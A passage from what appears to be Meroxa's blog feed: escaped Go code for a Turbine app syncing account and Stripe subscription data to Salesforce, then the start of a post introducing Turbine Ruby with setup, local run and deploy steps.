			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;table.types&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;VIEW&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;incrementing.column.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;validate.non.null&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;false&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; platformDB&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;tablename&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; configs&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

	v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; WriteToSalesforce&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//Converting the Turbine Record data to a form that&apos;s ready for&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;//sending to salesforce&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;RecordToProductData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; ProductData &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	accountId &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	createdAt &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_created_at&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	givenName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_given_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		givenName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	familyName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_family_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		familyName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	planName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;plan_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		planName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; ProductData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		accountId&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Itoa&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		email&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		givenName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            givenName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		familyName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;           familyName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		planName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;             planName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		stripeSubscriptionId&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;stripe_subscription_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		accountCreatedAt&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;     strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Itoa&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;createdAt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; WriteToSalesforce &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f WriteToSalesforce&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt; fetching of env vars&lt;/span&gt;

	salesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;newBasicSalesforceUpdater&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;salesforceInstanceUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceClientId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceUser&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforcePassword&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceToken&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Fatal&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;ERROR: salesforce updater creation failed&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; rr &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		pd &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;RecordToProductData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		subscriptionId &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;stripe_subscription_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		subscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; subscriptionFetcher&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fetchSubscriptionStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subscriptionId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	  &lt;span class=&quot;token comment&quot;&gt;//update our data with information from Stripe&lt;/span&gt;
		pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;subscriptionStatus &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; subscriptionStatus
		err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; salesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;pd&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// return original records unmodified&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; rr
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the interest of space I’ve included only interesting snippets of code, but the full source files can be found &lt;a href=&quot;https://gist.github.com/simonl2002/253729256ab225d40054d656402f4d96&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We’re currently running this application in production and it has allowed us to save almost $150,000 per year by ending our use of Workato. We already have a few updates in the pipeline to give our marketing and sales teams even more data. Look for future posts where I cover any updates we roll out.&lt;/p&gt;
&lt;p&gt;Hopefully, you come away from this post with an appreciation of how Turbine data apps can solve a class of problems that almost all companies have. Let us know what you think by joining the discussion on our &lt;a href=&quot;https://discord.meroxa.com&quot;&gt;Discord channel&lt;/a&gt; or in GitHub Discussions. We can’t wait to see what you build. Click &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBNQW1WZzBfZ3dwNWR0SXl1SUJqVGd1NGJHdkJRblNxaKFupWxvZ2luo3RpZNkgRU5kdFk4NkQyamxBbXNWeUR5NzJISjF3YU5Wdld5dGyjY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;response_type=code&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;mode=signUp&amp;#x26;_ga=2.71869648.2121119041.1674066866-1538797909.1674066866&quot;&gt;here&lt;/a&gt; to get started.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Turbine Ruby]]></title><description><![CDATA[Ruby developers can now build streaming data applications on Meroxa. Meroxa is a stream processing application PaaS.]]></description><link>https://meroxa.com/blog/introducing-turbine-ruby</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-turbine-ruby</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 24 Jan 2023 17:00:40 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce that software developers can now build Turbine data applications with Turbine Ruby. This addition expands the capabilities of our platform and allows for even greater flexibility in processing and analyzing data streams.&lt;/p&gt;
&lt;p&gt;The Turbine application framework is designed for software developers to build, test, and deploy their data streaming applications. Turbine streamlines this experience by abstracting away the complexity of running and scaling a data application: separate task-specific tooling, new and unfamiliar paradigms, and the management of complex services. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build, test, and deploy data streaming apps on Meroxa!&lt;/p&gt;
&lt;h2&gt;Turbine.rb&lt;/h2&gt;
&lt;p&gt;You can get started building your data streaming application in Ruby by creating a free &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&quot;&gt;Meroxa account&lt;/a&gt; and downloading our &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;. Setup also requires a local installation of &lt;a href=&quot;https://git-scm.com/book/en/v2/Getting-Started-Installing-Git&quot;&gt;Git&lt;/a&gt; and the latest Ruby version. We also recommend installing a Ruby version management tool of your choice.&lt;/p&gt;
&lt;p&gt;Recommended Ruby version management tools:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/rbenv/rbenv&quot;&gt;rbenv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://rvm.io/&quot;&gt;RVM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/asdf-vm/asdf-ruby&quot;&gt;asdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you have a Ruby version management tool installed, you can use it to install Ruby and specify whichever version your development use case calls for.&lt;/p&gt;
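As a concrete sketch, assuming rbenv (with its bundled ruby-build plugin) as your version manager, installing and pinning a version looks like this; the version number below is only an example:

```shell
# Install a specific Ruby version (example version; pick the one you need)
rbenv install 3.1.3

# Make that version the default for your user
rbenv global 3.1.3

# Confirm which interpreter is now active
ruby --version
```

Other managers such as RVM or asdf follow the same install-then-select pattern with their own commands.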
&lt;h2&gt;Quickstart&lt;/h2&gt;
&lt;p&gt;Once setup and installation are complete, you can start building your stream processing app. Initialize the streaming app within the local directory you are currently in by running the following command:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/CY9smIr8HKh34lFyIWor6TwjLa1XXHpwH_HByhUU_Yi5SwnLSBoVWyWE1-2GqXy67zoZTNnF7JmKpyLOLACxkf9fEGfakHNMsugDtEROPMg8D8yRVUCyrtVeNNSvmkBeLkm3oAedphopk_zDyWQBFlBAj6uHySFno-yGnJPZeO_8qVqvgh39gE655shO8g&quot; alt=&quot;Code snippet 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;You may define a different local directory path for the app project by using &lt;code class=&quot;language-text&quot;&gt;--path /your/local/path/&lt;/code&gt; in your command.&lt;/p&gt;
&lt;p&gt;A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app with Turbine.rb. The app project will include the following files:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/SZc-9kaNt5OU6O_P5yNubb1zxEs10TfcHU0kJ54V6SUzxSW1IrLYqfqeeHNUxslyQHWOrc-v0QoSub4Dcb078o9cv4EaByrLp62H2PIiGw5ueB_nBAB0gm9ca_kqCOu_vU4wcpVNBu8GJzy54q9NtwJ59cktPw9VikC38p5_fpezaAmOMXvy20dfRu6-KQ&quot; alt=&quot;Code snippet 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;app.rb&lt;/code&gt; file is the core of your streaming app. Self-documented TurbineRb boilerplate code is already written to help you get started at &lt;code class=&quot;language-text&quot;&gt;/your/local/path/yourappname/app.rb&lt;/code&gt;. All that awaits is your creativity demonstrated through code.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/-1WD_FQHm0BjCVJ9cqCfc6qpxWKEq8n7Zg2ZY4Zyqhmqoy5eAhWpkCDxz0Q_3DH6g5fmI9LeLUW2N8EM8vR1jakbukvfp-MtjJnuOwKVuYolvhmdgBzL6tLvl4so7Hdw5WpciplZMtYbUoHn2PttIBRWxjYooADurUn2TEZBlDLjLOTikWWmKa2DnIN7Sg&quot; alt=&quot;Code snippet 3&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the next section, we will run the example app above to test its output.&lt;/p&gt;
&lt;h2&gt;Running Your Application&lt;/h2&gt;
&lt;p&gt;You can run your app locally without changing any of the TurbineRb boilerplate code provided in the local app project directory. Simply navigate to the root of the app project using &lt;code class=&quot;language-text&quot;&gt;cd /your/local/path/yourappname&lt;/code&gt; and use &lt;code class=&quot;language-text&quot;&gt;meroxa app run&lt;/code&gt; to run your streaming app locally. Running the provided example app takes the records supplied by the fixtures, each of which contains a message, and outputs that exact message. You can enable the commented-out transformations to see them applied to the records.&lt;/p&gt;
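Put together, the local run comes down to two commands (the path and app name below are placeholders):

```shell
# Move into the root of the generated app project
cd /your/local/path/yourappname

# Run the streaming app locally against the fixture records
meroxa app run
```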
&lt;p&gt;If you see the following output, then you have successfully run a streaming app locally!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/pyaNUpc58XIL2S-nC_gszlhd9vzzDJuyCLzwFlIrlLZy3alsxN-tKrpumegDlf9Hm084JQLtK8pAN_eHqsIc7fTIeReMZt4olUkGGpUWw9hMhMf2kMUuEqgVl-ibjSLsmX7OTOtRHLRoREK8m5ax_w5XgGZ6qfSWxcLzN0aX-vEOImJLC130WHQnJmNqAg&quot; alt=&quot;Code snippet 4&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Deploying Your Application&lt;/h2&gt;
&lt;p&gt;Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Dashboard&lt;/a&gt; or the CLI by running the &lt;code class=&quot;language-text&quot;&gt;meroxa resources list&lt;/code&gt; command, which lists all resources and their state. If the resources don&apos;t exist, you must configure them using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Turbine framework uses git for version control. Upon initializing your application, &lt;code class=&quot;language-text&quot;&gt;git init&lt;/code&gt; is performed locally on your behalf. This creates a new repository in the project folder of your Turbine data app, which can be used to track your code. You will need to commit your code changes before deploying.&lt;/p&gt;
&lt;p&gt;Using the Meroxa CLI, run the &lt;code class=&quot;language-text&quot;&gt;meroxa app deploy&lt;/code&gt; command in the root of your Turbine data app’s project folder. This starts the deployment process; the Meroxa CLI will print out the steps taken and confirm once deployment is successful.&lt;/p&gt;
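A minimal deploy sequence might look like the following sketch; the commit message is only an example:

```shell
# Commit your changes first -- Turbine deploys the committed state of the repo
git add .
git commit -m "Add my record transformation"

# Deploy from the project folder root; the CLI prints each step it takes
meroxa app deploy
```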
